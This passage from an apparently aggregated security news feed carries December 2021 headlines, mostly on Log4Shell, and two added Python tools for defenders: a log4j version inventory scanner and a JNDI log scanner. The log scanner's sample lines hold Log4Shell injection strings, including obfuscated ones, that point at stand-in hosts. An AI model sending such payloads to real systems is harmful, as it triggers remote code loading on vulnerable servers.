Abstract Everyone's heard of the critical log4j zero-day by now. Dubbed 'Log4Shell,' the vulnerability has set the internet on fire. Below we summarize the four or more CVEs identified thus far, and pretty good reasons to ditch log4j version 2.15.0 for 2.16.0.

BleepingComputer
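The advice above (ditch 2.15.0, then 2.16.0) only helps if you know every log4j-core copy in your estate, and the hard ones to find are those nested inside wars, ears and shaded "fat" jars. The script below is an added example written for this page, not a vendor or Apache tool. It walks a directory, opens each archive (recursing into archives inside archives), reads the Maven pom.properties that log4j-core ships under META-INF, and flags any version below the first fixed release of its branch (2.17.0, with 2.12.3 for the Java 7 branch and 2.3.1 for the Java 6 branch, per the ASF advisory for CVE-2021-45105). Where pom.properties has been stripped, it falls back to looking for JndiLookup.class and reports the version as unknown. The fixture jars it builds under a temporary directory are constructed for the demo.

```python
"""Inventory log4j-core under a directory tree, including jars nested inside
wars/ears/fat jars, and flag versions below the fixed release for their
branch.  Added example for this page; not an Apache or vendor tool."""
import io
import os
import re
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")

# First release of each maintained branch without CVE-2021-44228/45046/45105
# (ASF advisory): 2.17.0 for Java 8+, 2.12.3 for Java 7, 2.3.1 for Java 6.
FIXED = {(2, 3): (2, 3, 1, 0), (2, 12): (2, 12, 3, 0)}
FIXED_DEFAULT = (2, 17, 0, 0)


def parse_version(s):
    """'2.14.1' -> (2, 14, 1, 0); a qualifier such as '2.0-beta9' gets -1 so it
    sorts below the final release of the same number."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(-.*)?$", s.strip())
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0),
            0 if m.group(4) is None else -1)


def is_vulnerable(version):
    """True when the version precedes the fixed release of its branch, or is
    unparseable (which should be reviewed by hand, so it is flagged too)."""
    v = parse_version(version)
    if v is None:
        return True
    return v < FIXED.get(v[:2], FIXED_DEFAULT)


def _scan_archive(blob, label, findings):
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return
    with zf:
        names = zf.namelist()
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.M)
            ver = m.group(1).strip() if m else "unknown"
            findings.append({"path": label, "version": ver, "vulnerable": is_vulnerable(ver)})
        elif JNDI_CLASS in names:      # shaded/relocated build with metadata stripped
            findings.append({"path": label, "version": "unknown", "vulnerable": True})
        for n in names:                # descend into nested archives
            if n.lower().endswith(ARCHIVE_EXT):
                _scan_archive(zf.read(n), f"{label}!{n}", findings)


def scan_tree(root):
    """Return one finding per log4j-core copy found under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.lower().endswith(ARCHIVE_EXT):
                p = os.path.join(dirpath, f)
                with open(p, "rb") as fh:
                    _scan_archive(fh.read(), p, findings)
    return findings


def _jar_bytes(entries):
    """Build an in-memory zip from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_tree(root):
    """Constructed fixture: two plain jars, a war nesting an old jar, a shaded
    jar without pom.properties, and an unrelated jar."""
    def pom(v):
        return f"#Generated by Maven\nversion={v}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n".encode()
    os.makedirs(os.path.join(root, "lib"))
    files = {
        "lib/log4j-core-2.15.0.jar": _jar_bytes({POM_PROPS: pom("2.15.0")}),
        "lib/log4j-core-2.17.0.jar": _jar_bytes({POM_PROPS: pom("2.17.0")}),
        "lib/shaded-app.jar": _jar_bytes({JNDI_CLASS: b"\xca\xfe\xba\xbe"}),
        "lib/other.jar": _jar_bytes({"META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n"}),
        "app.war": _jar_bytes({"WEB-INF/lib/log4j-core-2.14.1.jar": _jar_bytes({POM_PROPS: pom("2.14.1")})}),
    }
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)


def demo():
    """Build the fixture in a temp dir, scan it, return (relative path, version, vulnerable) sorted."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return sorted((f["path"][len(root) + 1:], f["version"], f["vulnerable"]) for f in scan_tree(root))


if __name__ == "__main__":
    for path, ver, vuln in demo():
        print(f"{'VULNERABLE' if vuln else 'ok        '}  {ver:8}  {path}")
```

Run it against a real tree with `scan_tree("/opt")` (or any deployment root); nested findings are labelled `outer.war!inner/path.jar` so the remediation target is unambiguous.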

December 16, 2021 – Hacker

‘Tropic Trooper’ Reemerges to Target Transportation Outfits Full Text

Abstract Analysts warn that the attack group, now known as ‘Earth Centaur,’ is honing its attacks to go after transportation and government agencies.

Threatpost

December 16, 2021 – Attack

‘PseudoManuscrypt’ Mass Spyware Campaign Targets 35K Systems Full Text

Abstract It’s similar to Lazarus’s Manuscrypt malware, but the new spyware is splattering itself onto government organizations and ICS in a non-Lazarus-like, untargeted wave of attacks.

Threatpost

December 16, 2021 – Malware

‘DarkWatchman’ RAT Shows Evolution in Fileless Malware Full Text

Abstract The new tool manipulates Windows Registry in unique ways to evade security detections and is likely being used by ransomware groups for initial network access.

Threatpost

December 16, 2021 – Botnet

New Phorpiex Botnet Variant Steals Half a Million Dollars in Cryptocurrency Full Text

Abstract Cryptocurrency users in Ethiopia, Nigeria, India, Guatemala, and the Philippines are being targeted by a new variant of the Phorpiex botnet called  Twizt  that has resulted in the theft of virtual coins amounting to $500,000 over the last one year. Israeli security firm Check Point Research, which detailed the attacks, said the latest evolutionary version "enables the botnet to operate successfully without active [command-and-control] servers," adding it supports no less than 35 wallets associated with different blockchains, including Bitcoin, Ethereum, Dash, Dogecoin, Litecoin, Monero, Ripple, and Zilliqa, to facilitate crypto theft. Phorpiex , otherwise known as Trik, is known for its sextortion spam and ransomware campaigns as well as cryptojacking, a scheme that leverages the targets' devices such as computers, smartphones, and servers to secretly mine cryptocurrency without their consent or knowledge. It's also infamous for its use of a technique called  cry

The Hacker News

December 16, 2021 – Attack

Log4j attackers switch to injecting Monero miners via RMI Full Text

Abstract Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success.

BleepingComputer
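The item above makes a detection point that is easy to get wrong: signatures keyed on `ldap://` alone miss the RMI variant, and payloads that carry both callbacks in one request, or hide the `jndi` token behind `${lower:j}` / `${::-j}` tricks or URL-encoding, slip past naive string matches. The scanner below is an added example written for this page, not BleepingComputer's or any vendor's detection logic. It first undoes URL-encoding and the common nested-lookup obfuscations, then extracts every JNDI callback scheme and host from each line, so a single request carrying both LDAP and RMI shows up as such. The log lines are constructed samples; the 203.0.113.0/24 addresses are documentation space, not real attacker hosts.

```python
"""Extract JNDI callback targets (LDAP, RMI, DNS, ...) from web server log lines,
after normalising URL-encoding and nested-lookup obfuscation.  Added example for
this page; the log lines below are constructed, not captured traffic."""
import re
from urllib.parse import unquote

# Obfuscation forms commonly seen in Log4Shell payloads; each resolves one
# innermost ${...} that contains no further braces.
_OBF = [
    # ${lower:j} / ${upper:j} -> j
    (re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I), lambda m: m.group(1)),
    # ${env:NOPE:-j} / ${::-j} -> j   (default-value syntax with a missing key)
    (re.compile(r"\$\{[^${}:]*:[^${}]*:-([^${}]*)\}"), lambda m: m.group(1)),
]

# A resolved lookup: ${jndi:<scheme>://<host[:port]> ...
JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^/${}\s]+)", re.I)

SAMPLE_LOG = [
    '10.0.0.5 - - [16/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [16/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [16/Dec/2021:10:01:06 +0000] "GET /?x=${${lower:j}ndi:rmi://203.0.113.7:1099/obj} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.12 - - [16/Dec/2021:10:02:00 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.8:1389/x}${jndi:rmi://203.0.113.8:1099/x}"',
    '10.0.0.13 - - [16/Dec/2021:10:02:30 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fa%7D HTTP/1.1" 200 12 "-" "-"',
]


def normalize(line, max_rounds=10):
    """URL-decode once, then peel obfuscation layers until nothing changes."""
    s = unquote(line)
    for _ in range(max_rounds):
        new = s
        for rx, fn in _OBF:
            new = rx.sub(fn, new)
        if new == s:
            break
        s = new
    return s.lower()


def find_jndi(line):
    """Return [(scheme, host[:port]), ...] for every callback in the line."""
    return [(m.group(1).lower(), m.group(2)) for m in JNDI.finditer(normalize(line))]


def scan(lines):
    """One hit per line that carries at least one JNDI callback; 'schemes' lets
    a rule key on LDAP+RMI-in-one-request as the item above describes."""
    hits = []
    for n, line in enumerate(lines, 1):
        callbacks = find_jndi(line)
        if callbacks:
            hits.append({"line": n, "callbacks": callbacks,
                         "schemes": sorted({s for s, _ in callbacks})})
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["line"], h["schemes"], h["callbacks"])
```

Feed it real access logs line by line; the host field is what you pivot on for egress blocking and for matching outbound LDAP/RMI connections in firewall logs.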

December 16, 2021 – General

Web App Attacks Rise by 251% in Two Years Full Text

Abstract Web app attacks have surged by 22% on average every quarter. Attacks on businesses in the U.K. have increased by 250% during this period. This increase has, in turn, caused a rise in data breaches.

Cyware Alerts - Hacker News

December 16, 2021 – Vulnerabilities

Officials point to Apache vulnerability in urging passage of cyber incident reporting bill Full Text

Abstract Key federal cybersecurity officials are pushing for passage of legislation to create mandates for certain organizations to report cyberattacks amid the fallout from a massive vulnerability in Apache logging package log4j, which has left organizations worldwide vulnerable.

The Hill

December 16, 2021 – Vulnerabilities

Researchers Uncover New Coexistence Attacks On Wi-Fi and Bluetooth Chips Full Text

Abstract Cybersecurity researchers have demonstrated a new attack technique that makes it possible to leverage a device's Bluetooth component to directly extract network passwords and manipulate traffic on a Wi-Fi chip. The novel attacks work against the so-called "combo chips," which are specialized chips that are equipped to handle different types of radio wave-based wireless communications, such as Wi-Fi, Bluetooth, and LTE. "We provide empirical evidence that coexistence, i.e., the coordination of cross-technology wireless transmissions, is an unexplored attack surface," a group of researchers from the Technical University of Darmstadt's Secure Mobile Networking Lab and the University of Brescia said in a  new paper . "Instead of escalating directly into the mobile [operating system], wireless chips can escalate their privileges into other wireless chips by exploiting the same mechanisms they use to arbitrate their access to the resources they share, i.e

The Hacker News

December 16, 2021 – General

Cyber Command Is in the Ransomware Game—Now What? Full Text

Abstract Some unresolved questions that policymakers must consider in exploring a role for the military in countering ransomware.

Lawfare

December 16, 2021 – Vulnerabilities

Flaws in Lenovo laptops allow escalating to admin privileges Full Text

Abstract The ImControllerService service of Lenovo laptops is affected by a privilege elevation bug that can allow attackers to execute commands with admin privileges. Lenovo laptops, including ThinkPad and Yoga families, are affected by privilege elevation issues...

Security Affairs

December 16, 2021 – General

Facebook disrupts operations of seven surveillance-for-hire firms Full Text

Abstract Facebook has disrupted the operations of seven different spyware-making companies, blocking their Internet infrastructure, sending cease and desist letters, and banning them from its platform.

BleepingComputer

December 16, 2021 – Attack

More Details on Log4Shell Attacks Full Text

Abstract A few days back, we got to know that threat actors are abusing a critical vulnerability—Log4Shell—in Log4j and propagating malware. Now, the attacks have grown more severe as new details emerge.

Cyware Alerts - Hacker News

December 16, 2021 – Government

US concerns grow over potential Russian cyber targeting of Ukraine amid troop buildup Full Text

Abstract The increase in tensions between the United States and Russia due to Moscow amassing troops on the border with Ukraine is raising concerns Russia may not only put boots on the ground but also turn to hacking operations to put pressure on the U.S. and Ukraine. 

The Hill

December 16, 2021 – Education

The Guide to Automating Security Training for Lean Security Teams Full Text

Abstract Cyber threats used to be less threatening. While nobody wants their customers' credit card numbers stolen in a data breach, or to see a deranged manifesto plastered over their company website, such incidents can almost seem quaint compared to ransomware attacks that bring all of your critical information systems to a dead halt. The frequency of these attacks  increased more than 150% in the U.S. last year, and in 2021 their global cost is expected to reach $20 billion. Effective, comprehensive security training is essential to mitigating these threats, many of which originate with low-profile phishing or malware attacks to get a foot in the door—attacks that can target anyone who works in your organization. A company's employees are the front line of defense against cyberattacks, and canned training videos and short quizzes are rarely sufficient to prepare them for this responsibility. The trouble with good training is that it takes not just expertise but time and other reso

The Hacker News

December 16, 2021 – Vulnerabilities

While attackers begin exploiting a second Log4j flaw, a third one emerges Full Text

Abstract Experts warn that threat actors are actively attempting to exploit a second bug disclosed in the popular Log4j logging library. American web infrastructure and website security company Cloudflare warns that threat actors are actively attempting...

Security Affairs

December 16, 2021 – Attack

McMenamins breweries hit by a Conti ransomware attack Full Text

Abstract Portland brewery and hotel chain McMenamins suffered a Conti ransomware attack over the weekend that disrupted the company's operations.

BleepingComputer

December 16, 2021 – Malware

Anubis Banking Trojan Resurfaces to Cripple Over 400 Financial Firms Full Text

Abstract A new campaign by the Anubis banking trojan is aimed at nearly 400 financial institutions. Hackers impersonated the official account management app for Orange Telecom. The malware collects significant information from victims by intercepting SMS, screen monitoring, GPS data collection, keylogging, file e ...

Cyware Alerts - Hacker News

December 16, 2021 – Government

Officials warn of increased hacking threat during holiday season Full Text

Abstract Senior Biden administration cybersecurity officials warned business leaders Thursday to be on guard against cyberattacks during the upcoming holiday season, noting that hackers are often more active when Americans are taking time away from work.

The Hill

December 16, 2021 – Malware

New Fileless Malware Uses Windows Registry as Storage to Evade Detection Full Text

Abstract A new JavaScript-based remote access Trojan (RAT) propagated via a social engineering campaign has been observed employing sneaky "fileless" techniques as part of its detection-evasion methods to elude discovery and analysis. Dubbed DarkWatchman by researchers from Prevailion's Adversarial Counterintelligence Team (PACT), the malware uses a resilient domain generation algorithm ( DGA ) to identify its command-and-control (C2) infrastructure and utilizes the Windows Registry for all of its storage operations, thereby enabling it to bypass antimalware engines. The RAT "utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation," researchers Matt Stafford and Sherman Smith  said , adding it "represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to o

The Hacker News

December 16, 2021 – Hacker

Multiple Nation-State actors are exploiting Log4Shell flaw Full Text

Abstract Nation-state actors from China, Iran, North Korea, and Turkey are attempting to exploit the Log4Shell vulnerability in attacks in the wild. Microsoft researchers reported that nation-state actors from China, Iran, North Korea, and Turkey are now abusing...

Security Affairs

December 16, 2021 – Solution

Google Calendar now lets you block invitation phishing attempts Full Text

Abstract Google now makes it easy to block unwanted calendar invitations, commonly used by threat actors in phishing and malicious campaigns, from being added to your Google Calendar.

BleepingComputer

December 16, 2021 – Privacy

PseudoManuscrypt Spyware Campaign Targets Thousands of ICS Computers Worldwide Full Text

Abstract This new malware contains advanced spying capabilities and has been seen targeting both government organizations and industrial control systems (ICS) across numerous industries.

Yahoo! Finance

December 16, 2021 – Malware

Owowa, a malicious IIS Server module used to steal Microsoft Exchange credentials Full Text

Abstract Threat actors are using a malicious Internet Information Services (IIS) Server module, dubbed Owowa, to steal Microsoft Exchange credentials. Kaspersky researchers spotted malicious actors while deploying a previously undiscovered binary, an Internet...

Security Affairs

December 16, 2021 – Ransomware

Microsoft: Khonsari ransomware hits self-hosted Minecraft servers Full Text

Abstract Microsoft urges admins of self-hosted Minecraft servers to upgrade to the latest release to defend against Khonsari ransomware attacks exploiting the critical Log4Shell security vulnerability.

BleepingComputer

December 16, 2021 – Attack

Portland-based Hotel and Brewpub Chain Suffers Cyberattack Likely Impacting Employee Data Full Text

Abstract Hotel and brewpub chain McMenamins was hit with a ransomware attack that may have compromised employees' personal information, but no customer payment information appears to have been impacted.

KGW

December 16, 2021 – Breach

Gumtree classifieds site leaked personal info via the F12 key Full Text

Abstract British classifieds site Gumtree.com suffered a data leak after a security researcher revealed that he could access sensitive personally identifiable data of advertisers simply by pressing F12 on the keyboard.

BleepingComputer

December 16, 2021 – Business

Noname Security Raises $135 Million at ‘Unicorn’ Valuation Full Text

Abstract The Silicon Valley-based startup came out of stealth in December 2020, and closed a $60 million Series B funding round in June 2021. To date, the company has raised $220 million.

Security Week

December 16, 2021 – Vulnerabilities

Lenovo laptops vulnerable to bug allowing admin privileges Full Text

Abstract Lenovo laptops, including ThinkPad and Yoga models, are vulnerable to a privilege elevation bug in the ImControllerService service allowing attackers to execute commands with admin privileges.

BleepingComputer

December 16, 2021 – Criminals

How expired web domains help criminal hackers unlock enterprise defenses Full Text

Abstract Organizations allow domains to expire for a number of reasons. Sometimes it’s a simple mistake: a domain renewal is overlooked because a payment method has expired or the renewal contact has moved on.

The Daily Swig

December 16, 2021 – Ransomware

Hive ransomware enters big league with hundreds breached in four months Full Text

Abstract The Hive ransomware gang is more active and aggressive than its leak site shows, with affiliates attacking an average of three companies every day since the operation became known in late June.

BleepingComputer

December 16, 2021 – General

What SMBs can do to protect against Log4Shell attacks Full Text

Abstract This flaw allows hackers to worm their way into unpatched systems to take control. It can endanger any endpoint because of its ultra-wide attack surface and the accompanying damage potential.

Malwarebytes Labs

December 16, 2021 – Botnet

Phorpiex botnet returns with new tricks making it harder to disrupt Full Text

Abstract The previously shut down Phorpiex botnet has re-emerged with new peer-to-peer command and control infrastructure, making the malware more difficult to disrupt.

BleepingComputer

December 16, 2021 – Botnet

Variant of Phorpiex Botnet Used for Cryptocurrency Attacks in Ethiopia, Nigeria, India, and 93 Other Countries Full Text

Abstract The cybercriminals behind the attacks are using a variant of the Phorpiex botnet -- dubbed "Twizt" -- to steal cryptocurrency through a process called "crypto clipping" from users across 96 countries.

ZDNet

December 16, 2021 – Solution

Firefox users can’t reach Microsoft.com — here’s what to do Full Text

Abstract Those using the Mozilla Firefox web browser are left unable to access the Microsoft.com domain. Tests by BleepingComputer confirm the issue relates to SSL certificate validation errors. Below we explain what you can do to remedy the issue.

BleepingComputer

December 16, 2021 – Breach

After theft of $77.7 million, victim AscendEX to reimburse customers Full Text

Abstract In a series of Tweets, the company said it is in the process of "standing up a new hot wallet infrastructure" and estimated that deposits and withdrawals would resume over the next two days.

ZDNet

December 15, 2021 – Malware

Malicious Exchange Server Module Hoovers Up Outlook Credentials Full Text

Abstract “Owowa” stealthily lurks on IIS servers, waiting to harvest successful logins when an Outlook Web Access (OWA) authentication request is made.

Threatpost

December 15, 2021 – Denial Of Service

Apache’s Fix for Log4Shell Can Lead to DoS Attacks Full Text

Abstract Not only is the jaw-dropping flaw in the Apache Log4j logging library ubiquitous; Apache’s blanket of a quickly baked patch for Log4Shell also has holes.

Threatpost

December 15, 2021 – Hacker

Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges Full Text

Abstract Web infrastructure company Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit a  second bug  disclosed in the widely used Log4j logging utility, making it imperative that customers move quickly to install the latest version as a barrage of attacks continues to pummel unpatched systems with a variety of malware. The new vulnerability, assigned the identifier  CVE-2021-45046 , makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug — CVE-2021-44228 aka Log4Shell — was "incomplete in certain non-default configurations." The issue has since been addressed in Log4j version 2.16.0. "This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0," Cloudflare's Andre Bluehs and Gabriel

The Hacker News

December 15, 2021 – General

Relentless Log4j Attacks Include State Actors, Possible Worm Full Text

Abstract More than 1.8 million attacks, against half of all corporate networks, have already launched to exploit Log4Shell.

Threatpost

December 15, 2021 – Malware

Emotet starts dropping Cobalt Strike again for faster attacks Full Text

Abstract Right in time for the holidays, the notorious Emotet malware is once again directly installing Cobalt Strike beacons for rapid cyberattacks.

BleepingComputer

December 15, 2021 – Business

Cequence adds $60M Series C to improve API security Full Text

Abstract Menlo Ventures led the latest round with participation from Icon Ventures, Telstra Ventures, HarbourVest Partners, Shasta Ventures, Dell Technologies Capital, and T-Mobile Ventures.

TechCrunch

December 15, 2021 – Business

Zoom joins counterterrorism tech group Full Text

Abstract Video conferencing platform Zoom has joined an independent counterterrorism group that shares information among major tech companies to combat violence and extremism.

The Hill

December 15, 2021 – Business

Facebook to Pay Hackers for Reporting Data Scraping Bugs and Scraped Datasets Full Text

Abstract Meta Platforms, the company formerly known as Facebook, has announced that it's expanding its  bug bounty program  to start rewarding valid reports of scraping vulnerabilities across its platforms as well as include reports of scraping data sets that are available online. "We know that automated activity designed to scrape people's public and private data targets every website or service," said Dan Gurfinkel, security engineering manager at Meta. "We also know that it is a highly adversarial space where scrapers — be it malicious apps, websites or scripts — constantly adapt their tactics to evade detection in response to the defenses we build and improve." To that end, the social media giant aims to  monetarily compensate  for valid reports of scraping bugs in its service and identify unprotected or openly public databases containing no less than 100,000 unique Facebook user records with personally identifiable information (PII) such as email, phone numb

The Hacker News

December 15, 2021 – Ransomware

The Strategic Intelligence Value of Ransomware Full Text

Abstract Foreign intelligence services can siphon a wealth of information from ransomware operations that are of operational and strategic value.

Lawfare

December 15, 2021 – Criminals

FBI’s investigation accidentally revealed the HelloKitty ransomware gang operates out of Ukraine Full Text

Abstract While investigating a data breach suffered by a healthcare organization, the FBI accidentally revealed that it believes the HelloKitty ransomware gang operates out of Ukraine. The investigation conducted by the FBI into a recent data breach suffered by an Oregon...

Security Affairs

December 15, 2021 – Vulnerabilities

SAP Kicks Log4Shell Vulnerability Out of 20 Apps Full Text

Abstract SAP’s still feverishly working to patch another 12 apps vulnerable to the Log4Shell flaw, while its Patch Tuesday release includes 21 other fixes, some rated at 9.9 criticality.

Threatpost

December 15, 2021 – Phishing

Large-scale phishing study shows who bites the bait more often Full Text

Abstract A large-scale phishing study involving 14,733 participants over a 15-month experiment has produced some surprising findings that contradict previous research results that formed the basis for popular industry practices.

BleepingComputer

December 15, 2021 – Hacker

Seedworm Targeting Telecom, IT, and Utility firms in the Middle East and Asia Full Text

Abstract Symantec revealed that the Iranian MuddyWater group has been targeting telecom operators, IT firms, and a utility company in the Middle East and other parts of Asia. Researchers observed that the attackers made a deliberate attempt to target more and more organizations by mounting a supply-chain at ...

Cyware Alerts - Hacker News

December 15, 2021 – Hacker

China, Iran among those exploiting Apache cyber vulnerability, researchers say Full Text

Abstract State-sponsored hackers from countries including Iran and China are actively exploiting a major vulnerability in Apache logging package log4j to target vulnerable organizations around the world, security researchers found this week.

The Hill

December 15, 2021 – Solution

Cynet’s MDR Offers Organizations Continuous Security Oversight Full Text

Abstract Today's cyber attackers are constantly looking for ways to exploit vulnerabilities and infiltrate organizations. To keep up with this evolving threat landscape, security teams must be on the lookout for potential risks around the clock. Since most organizations simply cannot afford to have 24x7 security teams, managed detection and response (MDR) services have become a critical aspect of any modern security stack.  Most organizations must find outsourced MDR providers on top of their existing solutions, but that's not always a feasible solution. XDR provider Cynet offers its MDR service ( learn more here ), which the company calls CyOps, as part of its offering. The service is much more than simply a help desk, though. CyOps offers a thorough MDR service that offers both monitoring and threat hunting, as well as incident response in cases where an attack is successful.  How CyOps operates The key selling point for CyOps MDR is that it enhances organizations' security a

The Hacker News

December 15, 2021 – Vulnerabilities

Microsoft December 2021 Patch Tuesday fixes an actively exploited zero-day Full Text

Abstract Microsoft December 2021 Patch Tuesday addresses 67 vulnerabilities, including an actively exploited Windows Installer vulnerability. Microsoft December 2021 Patch Tuesday addressed 67 vulnerabilities in Microsoft Windows and Windows Components, ASP.NET...

Security Affairs

December 15, 2021 – Government

CISA warns critical infrastructure to stay vigilant for ongoing threats Full Text

Abstract The Cybersecurity and Infrastructure Security Agency (CISA) warned critical infrastructure organizations today to strengthen their cybersecurity defenses against potential and ongoing threats.

BleepingComputer

December 15, 2021 – Business

Cylus raises $30M Series B to help protect trains and metros worldwide Full Text

Abstract The Series B funding round was led by Ibex Investors, with participation from Vertex Growth Fund, Strides International Business, Magma Venture Partners, Vertex Ventures Israel, and GlenRock Israel.

TechCrunch

December 15, 2021 – Hacker

Hackers Using Malicious IIS Server Module to Steal Microsoft Exchange Credentials Full Text

Abstract Malicious actors are deploying a previously undiscovered binary, an Internet Information Services (IIS) webserver module dubbed "Owowa," on Microsoft Exchange Outlook Web Access servers with the goal of stealing credentials and enabling remote command execution. "Owowa is a C#-developed .NET v4.0 assembly that is intended to be loaded as a module within an IIS web server that also exposes Exchange's Outlook Web Access (OWA)," Kaspersky researchers Paul Rascagneres and Pierre Delcher said. "When loaded this way, Owowa will steal credentials that are entered by any user in the OWA login page, and will allow a remote operator to run commands on the underlying server." The idea that a rogue IIS module can be fashioned as a backdoor is not new. In August 2021, Slovak cybersecurity company ESET's study of the IIS landscape revealed as many as 14 malware families that were developed as native IIS modules in an attempt to intercept HTTP traffic

The Hacker News

December 15, 2021 – APT

Iran-linked Seedworm APT targets Telecoms organizations across the Middle East and Asia Full Text

Abstract Researchers uncovered a new Seedworm campaign targeting telecommunication and IT service providers in the Middle East and Asia. Iran-linked APT group Seedworm (aka MERCURY, MuddyWater, TEMP.Zagros, or Static Kitten) is behind a new cyberespionage...

Security Affairs

December 15, 2021 – Hacker

State-sponsored hackers abuse Slack API to steal airline data Full Text

Abstract A suspected Iranian state-supported threat actor is deploying a newly discovered backdoor named 'Aclip' that abuses the Slack API for covert communications.

BleepingComputer

December 15, 2021 – Criminals

Hackers Steal $140 Million from Users of Crypto Gaming Company Full Text

Abstract The hackers stole the private keys to access 96 wallets, siphoning off 4.5 million PYR, which is VulcanForge's token that can be used across its ecosystem, the company said in a series of tweets.

Vice

December 15, 2021 – Government

DHS announces its ‘Hack DHS’ bug bounty program Full Text

Abstract The DHS has launched a new bug bounty program dubbed 'Hack DHS' to discover security vulnerabilities in external DHS systems. The Department of Homeland Security (DHS) has launched a new bug bounty program dubbed 'Hack DHS' that allows vetted white...

Security Affairs

December 15, 2021 – Hacker

Log4j vulnerability now used by state-backed hackers, access brokers Full Text

Abstract As expected, nation-state hackers of all kinds have jumped at the opportunity to exploit the recently disclosed critical vulnerability (CVE-2021-44228) in the Log4j Java-based logging library.

BleepingComputer

December 15, 2021 – Government

US government to offer up to $5,000 ‘bounty’ to hackers to identify cyber vulnerabilities Full Text

Abstract The DHS is launching a "bug bounty" program, potentially offering thousands of dollars to hackers who help the department identify cybersecurity vulnerabilities within its systems.

CNN Money

December 15, 2021 – Skimming

Sites hacked with credit card stealers undetected for months Full Text

Abstract Threat actors are gearing up for the holidays with credit card skimming attacks remaining undetected for months as payment information is stolen from customers.

BleepingComputer

December 15, 2021 – General

National cyber resilience requires closer integration of public and private efforts Full Text

Abstract Beyond intel sharing, the government and industry must boost sharing of best practices, and help each other implement these playbooks, especially for entities that support national critical functions.

Cyberscoop

December 15, 2021 – Business

Sysdig Raises $350 Million at $2.5 Billion Valuation Full Text

Abstract The latest funding round was led by Permira, with participation from Guggenheim Partners, Accel, Bain Capital Ventures, DFJ Growth, Glynn Capital, Goldman Sachs, Insight Partners, Next47, and others.

Security Week

December 14, 2021 – General

2022: Supply-Chain Chronic Pain & SaaS Security Meltdowns Full Text

Abstract Sounil Yu, CISO at JupiterOne, discusses the growing mesh of integrations between SaaS applications, which enables automated business workflows – and rampant lateral movement by attackers, well outside IT’s purview.

Threatpost

December 14, 2021 – Vulnerabilities

Apple iOS Update Fixes Cringey iPhone 13 Jailbreak Exploit Full Text

Abstract It took just 15 seconds to hack the latest, greatest, shiniest iPhone 13 Pro on stage at the Tianfu Cup in October, using a now-fixed iOS kernel bug.

Threatpost

December 14, 2021 – Vulnerabilities

Microsoft Issues Windows Update to Patch 0-Day Used to Spread Emotet Malware Full Text

Abstract Microsoft has rolled out Patch Tuesday updates to address multiple security vulnerabilities in Windows and other software, including one actively exploited flaw that's being abused to deliver Emotet, TrickBot, or Bazaloader malware payloads. The latest monthly release for December fixes a total of 67 flaws, bringing the total number of bugs patched by the company this year to 887, according to the Zero Day Initiative. Seven of the 67 flaws are rated Critical and 60 are rated as Important in severity, with five of the issues publicly known at the time of release. It's worth noting that this is in addition to the 21 flaws resolved in the Chromium-based Microsoft Edge browser. The most critical of the lot is CVE-2021-43890 (CVSS score: 7.1), a Windows AppX installer spoofing vulnerability that Microsoft said could be exploited to achieve arbitrary code execution. The lower severity rating is indicative of the fact that code execution hinges on the logged-on user level,

The Hacker News

December 14, 2021 – General

What the Log4Shell Bug Means for SMBs: Experts Weigh In Full Text

Abstract An exclusive roundtable of security researchers discuss the specific implications of CVE-2021-44228 for smaller businesses, including what’s vulnerable, what an attack looks like and to how to remediate.

Threatpost

December 14, 2021 – Vulnerabilities

Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released Full Text

